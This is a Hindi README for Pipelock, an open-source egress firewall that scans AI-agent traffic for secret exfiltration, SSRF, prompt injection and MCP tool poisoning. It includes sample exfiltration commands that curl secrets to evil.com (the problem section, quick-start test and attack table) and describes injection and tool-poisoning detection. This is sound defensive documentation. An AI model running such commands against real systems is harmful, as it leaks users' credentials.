
pipelock v3.3.0
एक ओपन-सोर्स AI एजेंट फ़ायरवॉल जो HTTP, MCP, A2A और WebSocket ट्रैफ़िक को डेटा बहिष्करण, SSRF और प्रॉम्प्ट इंजेक्शन के लिए स्कैन करता है, और ऑडिट के लिए सत्यापन योग्य हस्ताक्षरित कार्य रसीदें जारी करता है।
Pipelock
सत्यापन योग्य एग्रेस नियंत्रण के लिए ओपन-सोर्स AI एजेंट फ़ायरवॉल।
Pipelock AI एजेंटों और नेटवर्क के बीच बैठता है। यह मध्यस्थता वाले HTTP, WebSocket, MCP, और A2A ट्रैफ़िक के साथ-साथ TLS इंटरसेप्शन चालू होने पर CONNECT टनल सामग्री को सीक्रेट एक्सफ़िल्ट्रेशन, प्रॉम्प्ट इंजेक्शन, SSRF, टूल पॉइज़निंग और जोखिम भरी टूल-कॉल श्रृंखलाओं के लिए निरीक्षित करता है। बिना इंटरसेप्शन के सादा CONNECT होस्टनाम और URL स्तर पर स्कैन किया जाता है।
Pipelock सामग्री-जागरूक सीमा निर्णयों पर मध्यस्थ-हस्ताक्षरित कार्य रसीदें जारी करता है, ताकि समीक्षक यह सत्यापित कर सके कि Pipelock ने एजेंट रनटाइम के बाहर क्या निर्णय लिया। सार्वजनिक एजेंट-एग्रेस-बेंच कॉर्पस डिटेक्शन का अभ्यास करता है। अधिक जानें: ओपन-सोर्स AI फ़ायरवॉल।
इसके साथ काम करता है: Claude Code · OpenAI Codex · Cline · OpenCode · Zed · Cursor · VS Code · JetBrains · OpenAI Agents SDK · Google ADK · AutoGen · CrewAI · LangGraph
समस्या · सत्यापित करें · त्वरित आरंभ · कार्रवाई में देखें · पकड़ता है · विशेषताएँ · आर्किटेक्चर · दस्तावेज़ · प्लेग्राउंड · ब्लॉग · Dosu से पूछें
इसे लाइव प्लेग्राउंड में अपने ब्राउज़र पर आज़माएँ। अगर Pipelock इसके लायक साबित हो, तो रिपॉजिटरी को स्टार करें ताकि दूसरे लोग इसे खोज सकें।
समस्या
आपके AI एजेंट के वातावरण में $PROVIDER_API_KEY के साथ-साथ शेल एक्सेस है। एक अनुरोध इसे लीक कर सकता है:```bash
curl "https://evil.com/steal?key=$PROVIDER_API_KEY" # game over, unless pipelock is watching
हर मशीन कार्रवाई जो आपका एजेंट करता है, उसे आपके रहस्यों और खुले इंटरनेट के बीच एक सीमा पार करनी चाहिए। Pipelock वह सीमा बन जाता है जब एजेंट को इसके प्रॉक्सी, MCP रैपर, सैंडबॉक्स, होस्ट कंटेनमेंट मॉडल, या क्लस्टर डिप्लॉयमेंट टोपोलॉजी के माध्यम से रूट किया जाता है। यह मध्यस्थ आउटबाउंड और इनबाउंड ट्रैफ़िक को स्कैन करता है, मोड के आधार पर हमलों को ब्लॉक या फ़्लैग करता है, और निर्णय के हस्ताक्षरित साक्ष्य रिकॉर्ड करता है।
---
## इसे स्वयं सत्यापित करें
अधिकांश एजेंट-सुरक्षा उपकरण आपको उनके डैशबोर्ड पर भरोसा करने के लिए कहते हैं। Pipelock आपको एक हस्ताक्षरित रसीद देता है और आपको इसे स्वयं, ऑफ़लाइन, अपने पास रखी गई कुंजी से जांचने देता है। कोई खाता और कोई सर्वर नहीं।
अंतर्निहित डेमो वास्तविक हमले के परिदृश्यों को चलाता है, उन्हें ब्लॉक करता है, और हस्ताक्षरित रसीदों के साथ सार्वजनिक कुंजी को बिना किसी कॉन्फ़िगरेशन और नेटवर्क के डिस्क पर लिखता है।```bash
pipelock demo --receipts-dir ./out # runs attack scenarios, writes 7 signed receipts + signer.pub
pipelock verify-receipt "$(ls ./out/*.json | head -1)" --key ./out/signer.pub # check a signature yourself (each receipt is <action-id>.json)
स्कोरकार्ड प्रत्येक दावे का अपने आप में मूल्यांकन करता है और बताता है कि वह क्या साबित नहीं करता: क्या Pipelock द्वारा मध्यस्थ की गई सीमा के बाहर कुछ हुआ। इसके नीचे, रसीद समयरेखा दर्ज मध्यस्थ निर्णयों को उनके फैसलों और हैश लिंक के साथ सूचीबद्ध करती है। एक रसीद जो अपनी सीमाओं के बारे में ईमानदार है, उस हरे चेकमार्क को हरा देती है जो उन्हें छिपाता है।
साक्ष्य दर्शक मुफ्त है और किसी लाइसेंस की आवश्यकता नहीं है:```bash pipelock evidence serve --receipt-dir ./out # read-only HTML report for one recorded session pipelock evidence view --receipt-dir ./out # static offline report, no server
दो ईमानदारी नोट, पहले से बताए गए। डेमो एक अस्थायी कुंजी के साथ हस्ताक्षर करता है जिसे वह रन के लिए प्रिंट करता है, जो साबित करता है कि रसीदें स्व-संगत हैं न कि किसी नामित पहचान से बंधी हुई। सार्वजनिक Pipelock playground एक अलग पथ है जो Pipelock द्वारा प्रकाशित एक कुंजी के विरुद्ध सत्यापित करता है। और Pipelock चलाने वाला ऑपरेटर हस्ताक्षर कुंजी रखता है, इसलिए एक रसीद साबित करती है कि सीमा ने क्या निर्णय लिया और कुंजी धारक ने उस पर हस्ताक्षर किए, न कि यह कि ऑपरेटर ईमानदार है। `pipelock anchor receipts` रसीद-श्रृंखला चेकपॉइंट को स्थानीय बैकएंड या बाद के ऑडिट के लिए Rekor पारदर्शिता लॉग में रिकॉर्ड करता है, और उस एंकर के विरुद्ध ऑपरेटर-स्वतंत्र सत्यापन अभी भी अंत से अंत तक सिद्ध किया जा रहा है।
प्रमाण वादों को क्यों हराता है, इसका पूरा तर्क [प्रदर्शन बनाम प्रमाणन](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/security/demonstration-over-attestation.md) में है।
---
## त्वरित प्रारंभ```bash
# Install from source (Go 1.25+)
go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest
# Set up local agent integrations and generate a config
pipelock init
# Test the scanner
pipelock check --url "https://evil.com/?k=AKIAIOSFODNN7EXAMPLE" # blocked: AWS Access ID
pipelock check --url "https://docs.python.org/3/" # allowed
अन्य स्थापना विधियाँ
```bash # Download a binary # See https://github.com/luckyPipewrench/pipelock/releasesDocker
docker pull ghcr.io/luckypipewrench/pipelock:latest
Homebrew on macOS
brew install luckyPipewrench/tap/pipelock
</details>
<details>
<summary>रिलीज़ अखंडता की पुष्टि करें</summary>```bash
gh attestation verify pipelock_3.2.0_linux_amd64.tar.gz --owner luckyPipewrench
gh attestation verify oci://ghcr.io/luckypipewrench/pipelock:v3.2.0 --owner luckyPipewrench
रिलीज़ वर्कफ़्लो SLSA प्रोवेनेंस, CycloneDX SBOMs, चेकसम, और हस्ताक्षरित कंटेनर इमेज प्रकाशित करते हैं। go install के साथ स्रोत बिल्ड केवल-Community बाइनरी उत्पन्न करते हैं; पूर्व-निर्मित रिलीज़ आर्टिफैक्ट्स में भुगतान-स्तर कोड शामिल होता है जो एक वैध लाइसेंस कुंजी के साथ सक्रिय होता है।
इसे क्रियाशील देखें
Pro/Enterprise ऑपरेटर डैशबोर्ड (pipelock dashboard serve) हस्ताक्षरित साक्ष्य पर एक केवल-पढ़ने योग्य कंसोल है। यह टोकन, OIDC, या mTLS प्रमाणीकरण; सीमित RBAC अनुमतियाँ; संपादित मेटाडेटा दृश्य; रॉ-व्यू एलिवेशन; छूट जीवनचक्र रिकॉर्ड; बैकअप और रिस्टोर; कवरेज प्रमाणपत्र; और फ्लीट व्यू का समर्थन करता है। यह आवश्यक लाइसेंस सुविधा के साथ एंटरप्राइज़-टैग किए गए बिल्ड और रिलीज़ आर्टिफैक्ट्स में मौजूद है।
ऊपर दिखाया गया मुफ्त एकल-सत्र साक्ष्य दर्शक अलग है। इसे किसी लाइसेंस की आवश्यकता नहीं है और इसमें क्रॉस-एजेंट गणना नहीं है।
डैशबोर्ड गैलरी
मुफ्त रिपोर्ट और निगरानी
pipelock report --input events.jsonl जोखिम रेटिंग, समयरेखा, घटना श्रेणियां, और एक साक्ष्य परिशिष्ट के साथ HTML, JSON, या हस्ताक्षरित बंडल रिपोर्ट उत्पन्न करता है। मुफ्त Prometheus और Grafana पथ एक Pipelock इंस्टेंस की निगरानी करता है और Enterprise Conductor फ्लीट नियंत्रण तल से अलग है।
यह क्या पकड़ता है
एक सार्वजनिक, पुनरुत्पादनीय बेंचमार्क के विरुद्ध मापा गया
agent-egress-bench Pipelock या किसी अन्य टूल के विरुद्ध एजेंट-एक्सफिल्ट्रेशन और प्रॉम्प्ट-इंजेक्शन हमलों का एक कोर्पस चलाता है। संख्याएँ एक ऐसे रन से आती हैं जिसे कोई भी दोहरा सकता है, दावे से नहीं।
Pipelock तीन मोड में चलता है:
| मोड | सुरक्षा | वेब ब्राउज़िंग | उपयोग मामला |
|---|---|---|---|
| strict | केवल अनुमति सूची | कोई नहीं | विनियमित उद्योग, उच्च-सुरक्षा |
| balanced | नैव को ब्लॉक करता है + परिष्कृत का पता लगाता है | fetch या फ़ॉरवर्ड प्रॉक्सी के माध्यम से | अधिकांश डेवलपर्स (डिफ़ॉल्ट) |
| audit | केवल लॉगिंग | अप्रतिबंधित | प्रवर्तन से पहले मूल्यांकन |
अनसेंसर या एब्लिटरेटेड मॉडल चलाने वाले एजेंटों के लिए, hostile-model प्रीसेट स्ट्रिक्ट मोड पर रक्षा की परतें जोड़ता है: आक्रामक एंट्रॉपी थ्रेशोल्ड, ब्लैंकेट नेटवर्क-टूल ब्लॉकिंग, सत्र बाइंडिंग, क्रॉस-रिक्वेस्ट एक्सफिल्ट्रेशन डिटेक्शन, और एक पूर्व-कॉन्फ़िगर किल स्विच। pipelock audit इस प्रीसेट की अनुशंसा करता है जब यह निर्भरता संकेतों के माध्यम से ज्ञात गार्डरेल-हटाने वाली टूलचेन का पता लगाता है।
| हमला वेक्टर | Strict | Balanced | Audit |
|---|---|---|---|
curl evil.com -d $SECRET | रोका गया | रोका गया | लॉग किया गया |
| URL क्वेरी पैराम में रहस्य | रोका गया | DLP द्वारा पता लगाया गया | लॉग किया गया |
| URL में Base64-एन्कोडेड रहस्य | रोका गया | एंट्रॉपी और डिकोडेड DLP द्वारा पता लगाया गया | लॉग किया गया |
| DNS टनलिंग | रोका गया | सबडोमेन एंट्रॉपी द्वारा पता लगाया गया | लॉग किया गया |
| चंक्ड एक्सफिल्ट्रेशन | रोका गया | दर, बजट, और खंड जांच द्वारा पता लगाया गया | लॉग किया गया |
| URL में पब्लिक-की एन्क्रिप्टेड ब्लॉब | रोका गया | एंट्रॉपी फ़्लैग करने पर लॉग किया गया | लॉग किया गया |
ईमानदार मूल्यांकन: Strict मोड अनुमति सूचीबद्ध API डोमेन को छोड़कर Pipelock से गुज़रने वाले आउटबाउंड HTTP को ब्लॉक करता है, इसलिए प्रॉक्सी के माध्यम से कोई एक्सफिल्ट्रेशन चैनल नहीं है। Balanced मोड बार को "एक curl कमांड" से "परिष्कृत पूर्व-नियोजित हमले" तक बढ़ा देता है। Audit मोड आपको वह दृश्यता देता है जो आज आपके पास नहीं है। सैंडबॉक्स सक्षम (
pipelock sandbox) या होस्ट/क्लस्टर कंटेनमेंट टोपोलॉजी लागू होने पर, Pipelock सामग्री निरीक्षण के ऊपर एक OS या डिप्लॉयमेंट सीमा जोड़ता है। प्रत्यक्ष ईग्रेस को अभी भी उस सीमा द्वारा अवरुद्ध किया जाना चाहिए उन गैर-सहयोगी टूल के लिए जो प्रॉक्सी सेटिंग्स को अनदेखा करते हैं।
तुलना
| Pipelock | स्कैनर (agent-scan) | सैंडबॉक्स (srt) | कर्नेल एजेंट (agentsh) | |
|---|---|---|---|---|
| गुप्त एक्सफिल्ट्रेशन रोकथाम | Strict ब्लॉक करता है; balanced पता लगाता है | आंशिक (प्रॉक्सी मोड) | आंशिक (डोमेन-स्तर) | हाँ |
| DLP + एंट्रॉपी विश्लेषण | हाँ | नहीं | नहीं | आंशिक |
| प्रॉम्प्ट इंजेक्शन का पता लगाना | हाँ | हाँ | नहीं | नहीं |
| MCP स्कैनिंग (द्विदिश + टूल पॉइज़निंग) | हाँ | हाँ | नहीं | नहीं |
| WebSocket प्रॉक्सी (फ्रेम स्कैनिंग) | हाँ | नहीं | नहीं | नहीं |
| MCP HTTP ट्रांसपोर्ट (Streamable HTTP) | हाँ | नहीं | नहीं | नहीं |
| आपातकालीन किल स्विच (6 स्रोत) | हाँ | नहीं | नहीं | नहीं |
| टूल कॉल चेन का पता लगाना | हाँ | नहीं | नहीं | नहीं |
| प्रक्रिया सैंडबॉक्स (कोई Docker नहीं) | हाँ | नहीं | नहीं | हाँ (कर्नेल-स्तर) |
| एकल बाइनरी, शून्य निर्भरताएँ | हाँ | नहीं (Python) | नहीं (npm) | नहीं (कर्नेल) |
संदर्भ मैट्रिक्स: docs/comparison.md
प्रामाणिक तुलना केंद्र: AI रनटाइम सुरक्षा तुलना
OWASP एजेंटिक टॉप 10 कवरेज
| खतरा | कवरेज |
|---|---|
| ASI01 एजेंट लक्ष्य अपहरण | मजबूत: द्विदिश MCP + प्रतिक्रिया स्कैनिंग |
| ASI02 टूल दुरुपयोग | आंशिक: नियंत्रित टूल के रूप में प्रॉक्सी, MCP स्कैनिंग |
| ASI03 पहचान और विशेषाधिकार दुरुपयोग | मजबूत: क्षमता पृथक्करण + SSRF संरक्षण |
| ASI04 आपूर्ति श्रृंखला कमजोरियाँ | आंशिक: अखंडता निगरानी + MCP स्कैनिंग |
| ASI05 अप्रत्याशित कोड निष्पादन | मध्यम: HITL अनुमोदन, fail-closed डिफ़ॉल्ट |
| ASI06 मेमोरी और संदर्भ विषाक्तता | मध्यम: इंजेक्शन का पता लगाना + सत्र दूषण प्रसार |
| ASI07 असुरक्षित अंतर-एजेंट संचार | आंशिक: MCP/A2A स्कैनिंग, एजेंट ID, अखंडता, हस्ताक्षर |
| ASI08 कैस्केडिंग विफलताएँ | मध्यम: fail-closed आर्किटेक्चर, दर सीमित करना |
| ASI09 मानव-एजेंट विश्वास शोषण | आंशिक: HITL मोड, ऑडिट लॉगिंग |
| ASI10 दुष्ट एजेंट | मजबूत: डोमेन अनुमति सूची + दर सीमित करना + क्षमता पृथक्करण |
विवरण, कॉन्फ़िग उदाहरण, और अंतराल विश्लेषण: docs/owasp-mapping.md
यह क्या करता है
Pipelock एक AI ईग्रेस प्रॉक्सी और MCP सुरक्षा नियंत्रण है। यह आपके AI एजेंट और नेटवर्क के बीच इनलाइन बैठता है, आउटबाउंड और इनबाउंड ट्रैफ़िक को स्कैन करता है, और एजेंट रनटाइम के बाहर प्रमाणन के लिए हस्ताक्षरित रसीदें और मध्यस्थता मेटाडेटा उत्सर्जित करता है। AARP/SVID कार्यभार-पहचान मूल्यांकन आज सत्यापनकर्ता-पक्ष पर है: प्रॉक्सी और MCP रनटाइम लाइव अनुमति/अस्वीकार निर्णयों में SVID साक्ष्य का उपभोग नहीं करते हैं या X.509-SVID से रसीद अभिनेता पहचान बांधते हैं।
पहचान और स्कैनिंग
- ऑर्डर्ड URL स्कैनर पाइपलाइन: URL लंबाई और पार्सिंग जाँच, स्कीम सत्यापन, CRLF और पथ-ट्रैवर्सल पहचान, अनुमति सूची और ब्लॉकलिस्ट नीति, अपरिवर्तनीय शाब्दिक-IP SSRF और कोर-DLP मंजिलें, कॉन्फ़िगर्ड DLP, पथ और सबडोमेन एंट्रॉपी विश्लेषण, DNS SSRF और रीबाइंडिंग सुरक्षा, प्रति-डोमेन दर सीमाएँ, डेटा बजट, और अंतिम संदर्भ जाँच। DLP DNS रिज़ॉल्यूशन से पहले चलता है, इसलिए DNS क्वेरी प्रॉक्सी से बाहर निकलने से पहले रहस्य पकड़े जाते हैं। देखें docs/bypass-resistance.md।
- DLP: API कुंजियाँ, टोकन, क्रेडेंशियल्स, क्रिप्टोकरेंसी कुंजियाँ, पर्यावरण रहस्य, और चेकसम सत्यापन के साथ वित्तीय पहचानकर्ताओं के लिए 65 अंतर्निहित पैटर्न। BIP-39 सीड वाक्यांश पहचान शब्दकोश लुकअप, स्लाइडिंग विंडो, और SHA-256 चेकसम सत्यापन का उपयोग करती है।
- प्रतिक्रिया स्कैनिंग: 32 अंतर्निहित प्रॉम्प्ट-इंजेक्शन और स्थिति/नियंत्रण विषाक्तता पैटर्न, साथ ही शून्य-चौड़ाई वाले वर्णों, होमोग्लिफ़्स, लीटस्पीक, वैकल्पिक व्हाइटस्पेस, स्वर फोल्डिंग, base64, और हेक्स के लिए 6-पास सामान्यीकरण। क्रियाएँ
block,strip,warn, याaskहैं। - स्ट्रीमिंग SSE: LLM गेटवे और MCP HTTP/SSE से
text/event-streamप्रतिक्रियाएँ प्रति-घटना और रोलिंग क्रॉस-इवेंट DLP और इंजेक्शन स्कैनिंग के साथ टोकन दर टोकन प्रवाहित होती हैं। एक पहचान स्ट्रीम को fail-closed समाप्त करती है। देखें SSE स्ट्रीमिंग गाइड। - अनुरोध बॉडी स्कैनिंग: हेडर और बॉडी को सुरक्षित पथ छोड़ने से पहले JSON, फ़ॉर्म डेटा, रॉ टेक्स्ट, रिवर्स प्रॉक्सी अनुरोध, TLS-इंटरसेप्टेड CONNECT ट्रैफ़िक, और आउटबाउंड WebSocket क्लाइंट फ्रेम में स्कैन किया जाता है।
- अनुरोध संपादन: वैकल्पिक JSON पुनर्लेखन मिलान किए गए गुप्त मानों को HTTP, WebSocket, और MCP
tools/callआर्गुमेंट्स में<pl:aws-access-key:1>जैसे टाइप किए गए प्लेसहोल्डर से बदल देता है। रसीदें सादे पाठ रहस्यों के बजाय सक्रिय प्रोफ़ाइल और प्रति-वर्ग गणना रिकॉर्ड करती हैं। - पता संरक्षण: ETH, BTC, SOL, और BNB पता सत्यापन उपसर्ग/प्रत्यय फिंगरप्रिंटिंग और एक ऑपरेटर अनुमति सूची का उपयोग करके समान दिखने वाले गंतव्य स्वैप को पकड़ता है।
- व्याख्या योग्य निष्कर्ष:
pipelock explain <url>(साथ हीexplain event <id>औरexplain mcp) स्कैनर, परत, मिलान नियम, निरीक्षित सतह, और गलत सकारात्मक के लिए सबसे संकीर्ण उपलब्ध कॉन्फ़िग नॉब प्रिंट करता है। देखेंdocs/cli/explain.md। - कैनरी टोकन:
pipelock canaryहनीटोकन कॉन्फ़िग उत्पन्न करता है। एक कृत्रिम रहस्य आउटबाउंड ट्रैफ़िक में दिखाई देता है जो साबित करता है कि एक एजेंट या उसकी श्रृंखला में कुछ पर्यावरण चर एक्सफिल्ट्रेट कर रहा है। देखें कैनरी टोकन। - स्किल-फ़ाइल स्कैनिंग:
pipelock skill-scanएजेंट स्किल फ़ाइलों की सूची बनाता है, उनकी तुलना ऑपरेटर-स्वामित्व वाली लॉक फ़ाइल से करता है, और कुछ भी चलने से पहले स्रोत-से-सिंक संयोजनों जैसे क्रेडेंशियल-टू-नेटवर्क-सिंक या शेल-टू-राइट को पंक्ति साक्ष्य के साथ फ़्लैग करता है। देखेंdocs/cli/skill-scan.md।
MCP सुरक्षा
Pipelock MCP सर्वरों को द्विदिश स्कैनिंग के साथ लपेटता है:```bash
Wrap a local MCP server over stdio
pipelock mcp proxy --config pipelock.yaml -- npx -y @modelcontextprotocol/server-filesystem /tmp
Bridge a stdio client to a remote Streamable HTTP server
pipelock mcp proxy --upstream http://localhost:8080/mcp
Run the HTTP proxy and an MCP HTTP listener together
pipelock run --config pipelock.yaml --mcp-listen 127.0.0.1:8889 --mcp-upstream http://localhost:3000/mcp
- **इनपुट स्कैनिंग:** MCP क्लाइंट अनुरोधों को टूल आर्गुमेंट्स में DLP लीक और इंजेक्शन के लिए जांचा जाता है।
- **प्रतिक्रिया स्कैनिंग:** सर्वर प्रतिक्रियाओं को एजेंट द्वारा देखे जाने से पहले स्कैन किया जाता है।
- **टूल पॉइज़निंग:** `tools/list` विवरणों में छिपे निर्देशों और सत्र के बीच में रग-पुल परिवर्तनों की जाँच की जाती है।
- **टूल नीति:** 17 अंतर्निहित नियम विनाशकारी फ़ाइल हटाने, क्रेडेंशियल एक्सेस, रिवर्स शेल, पर्सिस्टेंस मैकेनिज्म, एनकोडेड कमांड निष्पादन, और संबंधित उच्च-जोखिम टूल कॉल को निष्पादन से पहले ब्लॉक करते हैं।
- **टूल कॉल चेन:** 10 अंतर्निहित श्रेणी-अक्ष पैटर्न रिकॉनिसेंस, क्रेडेंशियल चोरी, डेटा स्टेजिंग, पर्सिस्टेंस, एक्सफ़िल्ट्रेशन, और कॉलबैक चेन का पता लगाते हैं, जिसमें कॉन्फ़िगरेबल गैप टॉलरेंस होता है।
- **A2A निरीक्षण:** Google Agent-to-Agent प्रोटोकॉल ट्रैफ़िक का फ़ॉरवर्ड और MCP पथों पर निरीक्षण किया जाता है; Pipelock एक स्वतंत्र A2A प्रॉक्सी नहीं है।
- **प्रमाणित MCP HTTP लिसनर (v3.2.0):** नॉन-लूपबैक MCP लिसनर डिफ़ॉल्ट रूप से फेल क्लोज़ होते हैं और `--mcp-auth-token-file` या नेटवर्क-पॉलिसी-आइसोलेटेड डिप्लॉयमेंट के लिए एक स्पष्ट `--mcp-allow-unauthenticated` की आवश्यकता होती है। टोकन रहित लूपबैक लिसनर DNS-रिबाउंड और गलत पोर्ट Host प्राधिकरणों को अस्वीकार करते हैं और लिसनर क्रेडेंशियल्स को हेडर से हटाते हैं।
### कंटेनमेंट
अनप्रिविलेज्ड प्रोसेस कंटेनमेंट OS-नेटिव प्रिमिटिव का उपयोग करता है। Linux Landlock, seccomp, और नेटवर्क नेमस्पेस का उपयोग करता है। macOS `sandbox-exec` प्रोफ़ाइल का उपयोग करता है। कंटेनरों में, `--best-effort` Landlock और seccomp को तब रखता है जब नेमस्पेस निर्माण प्रतिबंधित होता है, जबकि नेटवर्क स्कैनिंग प्रॉक्सी-आधारित रूटिंग का उपयोग करती है।```bash
pipelock sandbox --config pipelock.yaml -- python agent.py
pipelock sandbox --best-effort -- python agent.py
pipelock mcp proxy --sandbox --config pipelock.yaml -- npx server
होस्ट कंटेनमेंट लिनक्स पर और आगे बढ़ता है:```bash pipelock contain install pipelock contain verify pipelock contain run -- claude-code
`pipelock contain install / run / verify / rollback / add-tool / grant-workspace / revoke-workspace / ca-refresh` 3-UID operator / proxy / agent मॉडल को nftables owner-match रूटिंग, systemd सेवा सेटअप, रैपर कमांड, वर्कस्पेस ACL, CA रिफ्रेश, और पोस्चर एविडेंस के साथ प्रबंधित करता है। देखें [`docs/contain-cli.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/contain-cli.md)।
### साक्ष्य और रसीदें
- **फ्लाइट रिकॉर्डर:** Ed25519-हस्ताक्षरित चेकपॉइंट और DLP रिडक्शन के साथ हैश-चेन्ड JSONL साक्ष्य लॉग। `pipelock init` स्टॉक इंस्टॉल के लिए एक रिकॉर्डर डायरेक्टरी और साइनिंग की प्रदान करता है, जबकि रिकॉर्डर तब तक निष्क्रिय रहता है जब तक कोई डायरेक्टरी और की मौजूद न हो। देखें [फ्लाइट रिकॉर्डर](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/flight-recorder.md)।
- **कार्रवाई रसीदें:** मध्यस्थ कार्रवाइयों के लिए हस्ताक्षरित रिकॉर्ड जारी होते हैं, जिनमें निर्णय, पॉलिसी हैश, ट्रांसपोर्ट, और स्कैनर लेयर शामिल होते हैं। ब्लॉक रसीदें उत्पन्न करते हैं; अनुमति-पथ रसीद प्रवर्तन के लिए `flight_recorder.require_receipts` की आवश्यकता है। `pipelock verify-receipt --key <signer.pub>` के साथ सत्यापित करें। अनपिन्ड रन केवल संरचनात्मक होते हैं और `--allow-unpinned` पारित होने तक गैर-शून्य कोड से बाहर निकलते हैं।
- **मध्यस्थता लिफाफा:** अग्रेषित HTTP अनुरोधों और MCP `_meta` पर RFC 8941 साइडबैंड मेटाडेटा, जिसमें कार्रवाई प्रकार, निर्णय, अभिनेता पहचान, पॉलिसी हैश, दूषण संदर्भ, और रसीद सहसंबंध आईडी शामिल है। देखें [फेडरेशन गाइड](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/federation.md)।
- **रसीद अनुरूपता:** चार स्वतंत्र क्रॉस-भाषा सत्यापक कार्यान्वयन (Go, TypeScript, Rust, और Python) एक साझा [अनुरूपता संग्रह](https://github.com/luckypipewrench/pipelock/blob/HEAD/sdk/conformance/) के विरुद्ध चलते हैं, जिसमें दोषपूर्ण और जालसाजी योग्य इनपुट जैसे डुप्लिकेट कुंजी, पूर्णांक अतिप्रवाह, और अयुग्मित सरोगेट शामिल हैं। ब्राउज़र wasm सतह Go सत्यापक कार्यान्वयन का पुन: उपयोग करती है। AARP/SVID मूल्यांकन एक ऑफ़लाइन सत्यापक प्रोफ़ाइल बना रहता है, रनटाइम पहचान प्रवर्तन नहीं।
- **एंकर:** `pipelock anchor receipts` स्थानीय बैकएंड या Rekor पर रसीद-श्रृंखला चेकपॉइंट रिकॉर्ड करता है। Rekor एंकरिंग बाद के ऑडिट के लिए प्रमाण सामग्री है; Rekor सत्यापन के लिए पिन्ड लॉग कुंजी की आवश्यकता है और एंड-टू-एंड ऑपरेटर-स्वतंत्रता पथ अभी भी सिद्ध किया जा रहा है।
- **पोस्चर कैप्सूल:** `pipelock posture emit` और `pipelock posture verify` एक तैनाती के प्रवर्तन पोस्चर का हस्ताक्षरित स्नैपशॉट उत्पन्न और जांचते हैं, जिसमें CI गेट और स्कोरिंग मॉडल होता है, ताकि एक समीक्षक यह पुष्टि कर सके कि सीमा उस तरह कॉन्फ़िगर की गई थी जैसा वह दावा करती है।
### फ्लीट और एंटरप्राइज
- **ऑपरेटर डैशबोर्ड:** `pipelock dashboard serve` एक रीड-ओनली कंसोल है जो हस्ताक्षरित साक्ष्य पर आधारित है। Pro अवलोकन, साक्ष्य, छूट, एजेंट, बजट, और विश्वास और कुंजी दृश्यों को अनलॉक करता है; Enterprise फ्लीट, वर्कबेंच, और घटना दृश्य जोड़ता है। देखें [`docs/cli/dashboard.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/dashboard.md)।
- **मुफ्त साक्ष्य दर्शक:** `pipelock evidence serve` और `pipelock evidence view` बिना लाइसेंस या क्रॉस-एजेंट गणना के एक चयनित रिकॉर्डर सत्र प्रस्तुत करते हैं। `pipelock evidence verify-cert` Pro द्वारा जारी कवरेज प्रमाणपत्रों को ऑफ़लाइन सत्यापित करता है।
- **कंडक्टर:** हस्ताक्षरित पॉलिसी-बंडल वितरण, हस्ताक्षरित साक्ष्य सिंक (`pipelock fleet-sink`), नामांकन, रिमोट किल, रोलबैक, ड्राई-रन, निर्णय पुनर्चालन, और mTLS/SPIFFE पर रनटाइम/एप्लाई-स्टेट ड्रिफ्ट प्रीफ्लाइट के लिए एंटरप्राइज फ्लीट कंट्रोल प्लेन। अनुयायी स्थानीय रूप से प्रवर्तन करते हैं; डिफ़ॉल्ट स्टेल-पॉलिसी मोड अपनी ग्रेस विंडो के बाद एक स्वतंत्र अस्वीकृति स्रोत को सक्रिय करता है, जबकि प्रलेखित `continue_last_known_good` ओवरराइड उस पोस्चर को कमजोर करता है। कंडक्टर कोई एजेंट रहस्य नहीं रखता है। देखें [कंडक्टर गाइड](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/conductor.md)।
- **कानूनी रोक:** `pipelock dashboard legal-hold add/list/release` डैशबोर्ड के HTTP अधिकार के बाहर रखे गए अनुपालन मेटाडेटा के रूप में संरक्षण रोकों का प्रबंधन करता है, ताकि एक समझौता किया गया डैशबोर्ड रोकों को पढ़ सके लेकिन उन्हें कभी जाली या हटा न सके।
- **व्यवहारिक आधाररेखा:** `pipelock baseline list/show/ratify/forget` के साथ MCP टूल व्यवहार के लिए प्रोफ़ाइल-फिर-लॉक, ऑपरेटर अनुमोदन और पुनर्सीखने के लिए। देखें [`docs/cli/baseline.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/baseline.md)।
### संचालन क्षमता
- **किल स्विच:** छह स्वतंत्र सक्रियण स्रोत: कॉन्फ़िग फ़ाइल, रिमोट API, SIGUSR1, संतरी फ़ाइल, कंडक्टर रिमोट किल, और स्टेल-बंडल पहचान। कोई भी एक सक्रिय स्रोत ट्रैफ़िक को अवरुद्ध करता है, नियंत्रक में एंडपॉइंट और IP छूट के साथ।
- **स्कैन API:** बियरर टोकन प्रमाणीकरण, प्रति-टोकन दर सीमा, संरचित निष्कर्ष, और Prometheus मीट्रिक के साथ `url`, `dlp`, `prompt_injection`, और `tool_call` निर्णयों के लिए प्रोग्रामेटिक स्कैनिंग। देखें [docs/scan-api.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/scan-api.md)।
- **फ़ाइलसिस्टम संतरी:** एजेंट वर्किंग डायरेक्टरीज़ पर डिस्क पर लिखे गए रहस्यों के लिए नज़र रखता है और Linux पर MCP सबप्रोसेस वंशावली में लेखन को विशेषता देता है। देखें [docs/guides/filesystem-sentinel.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/filesystem-sentinel.md)।
- **ईवेंट उत्सर्जन:** प्रॉक्सी हॉट पथ को अवरुद्ध किए बिना ऑडिट ईवेंट को SIEM, वेबहुक रिसीवर, syslog, CEF, OTLP, और मीट्रिक आउटपुट पर अग्रेषित करता है। देखें [docs/guides/siem-integration.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/siem-integration.md)।
